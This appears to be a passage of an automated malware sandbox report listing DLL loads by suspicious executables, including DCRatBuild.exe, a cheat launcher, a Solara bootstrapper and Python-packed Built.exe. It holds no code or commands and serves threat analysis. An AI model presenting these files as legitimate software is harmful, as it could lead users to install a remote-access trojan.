    Source: C:\Users\user\AppData\Local\Temp\x10.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x10.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x10.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x10.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x9.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x9.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x9.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x9.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x9.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x9.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x9.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x9.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x9.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x9.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x9.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x9.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x9.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x9.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x9.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x9.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x9.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x9.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x9.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x9.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x9.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x9.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x8.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x8.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x8.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x8.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x8.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x8.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x8.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x8.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x8.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x8.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x8.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x8.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x8.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x8.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x8.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x8.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x8.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x8.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x8.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x8.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x8.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x8.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x7.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x7.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x7.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x7.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x7.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x7.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x7.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x7.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x7.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x7.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x7.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x7.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x7.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x7.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x7.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x7.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x7.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x7.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x7.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x7.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x7.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x7.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x6.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x6.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x6.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x6.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x6.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x6.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x6.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x6.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x6.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x6.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x6.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x6.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x6.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x6.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x6.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x6.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x6.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x6.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x6.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x6.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x6.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x6.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x5.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x5.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x5.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x5.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x5.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x5.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x5.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x5.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x5.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x5.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x5.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x5.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x5.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x5.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x5.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x5.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x5.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x5.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x5.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x5.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x5.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x5.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x4.exeSection loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\x4.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\x4.exeSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\x4.exeSection loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\x4.exeSection loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\x4.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\x4.exeSection loaded: propsys.dll
    Source: C:\Users\user\AppData\Local\Temp\x4.exeSection loaded: edputil.dll
    Source: C:\Users\user\AppData\Local\Temp\x4.exeSection loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\x4.exeSection loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\x4.exeSection loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\x4.exeSection loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\x4.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\AppData\Local\Temp\x4.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\x4.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\x4.exeSection loaded: appresolver.dll
    Source: C:\Users\user\AppData\Local\Temp\x4.exeSection loaded: bcp47langs.dll
    Source: C:\Users\user\AppData\Local\Temp\x4.exeSection loaded: slc.dll
    Source: C:\Users\user\AppData\Local\Temp\x4.exeSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\Temp\x4.exeSection loaded: sppc.dll
    Source: C:\Users\user\AppData\Local\Temp\x4.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\x4.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: aclayers.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: mpr.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: sfc.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: sfc_os.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: propsys.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: edputil.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: appresolver.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: bcp47langs.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: slc.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: sppc.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: aclayers.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: mpr.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: sfc.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: sfc_os.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: dxgidebug.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: rsaenh.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: dwmapi.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: cryptbase.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: riched20.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: usp10.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: msls31.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: iconcodecservice.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: windowscodecs.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: textshaping.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: textinputframework.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: coreuicomponents.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: coremessaging.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: ntmarta.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: coremessaging.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: propsys.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: edputil.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: policymanager.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: msvcp110_win.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: appresolver.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: bcp47langs.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: slc.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: sppc.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: pcacli.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: mscoree.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: aclayers.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: mpr.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: sfc.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: sfc_os.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: cryptsp.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rsaenh.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: cryptbase.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rasapi32.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rasman.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rtutils.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: mswsock.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: winhttp.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: iphlpapi.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: dhcpcsvc6.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: dhcpcsvc.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: dnsapi.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: winnsi.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rasadhlp.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: fwpuclnt.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: secur32.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: schannel.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: mskeyprotect.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ntasn1.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ncrypt.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ncryptsslp.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: msasn1.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: gpapi.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: propsys.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: edputil.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: appresolver.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: bcp47langs.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: slc.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: sppc.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: vcruntime140.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: python3.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: libffi-8.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: sqlite3.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: iphlpapi.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: libcrypto-3.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: libssl-3.dll
